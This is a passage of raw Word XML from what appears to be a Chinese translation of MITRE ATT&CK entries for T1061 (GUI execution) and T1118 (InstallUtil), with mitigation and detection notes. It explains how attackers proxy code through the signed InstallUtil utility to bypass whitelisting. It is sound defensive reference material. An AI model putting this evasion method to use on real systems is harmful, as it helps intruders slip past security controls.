      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。还要在端点系统上查</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>成功的行为，例如浏览器</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ffice</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>进程的异常行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可疑文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>插入来试图掩盖执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>证据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>表明</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它工具传输到系统的异常网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552D7474" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图形用户界面</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="1A6FF960" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BD97376" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1061</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702F503A" w14:textId="4829C6AB" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6225C385" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCAA84C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>普通用户</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A7436D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>二进制文件的元信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D281F1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CFD01F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54BE8F9F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D98A5FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00032277" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用户图形化界面</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(GUI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是一种常用的与系统交互的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424FC4E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>恶意者可能在操作中使用系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>界面，通常是通过远程交互式会话，如远程桌面协议而非命令行，来在鼠标双击、</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00032277">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运行命令或其他难以监控的交互中搜索信息和执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F01FEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C053D34" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="006950EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种攻击技术难以用防护手段缓解，因为它是基于滥用系统的功能特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009F4FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49088CEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B02B22" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B02B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B02B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00B02B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行可能会导致大量的误报。应考虑使用其它因素检测由于滥用服务而导致的恶意者通过远程交互会话而获取系统访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6812C259" w14:textId="100BA6CB" w:rsidR="000F2665" w:rsidRPr="00633DED" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B02B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在远程会话中超出普通行为的未知或不寻常进程创建是有嫌疑的。收集并审计可以表明访问的安全日志，同时在网络中使用合法的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00B02B22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做远程访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6CC44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="377FCC6C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29C710D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1118</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DCD9AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37977AB8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="494BB983" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7918BA2B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44AAECD2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4C0F06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，数字证书</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE9581C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE5F89F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD20AD9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F708D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行实用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于通过执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件中指定的特定安装程序组件来安装和卸载资源。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行数字签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001AEA10" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过受信任的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序来代理执行代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>还可以用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nstallutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>绕过进程白名单，方法是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在二进制文件中使用属性，这些属性执行用属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[System.ComponentModel.RunInstaller(true)]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修饰的类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23922601" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="7D204835" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="38C8C510" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
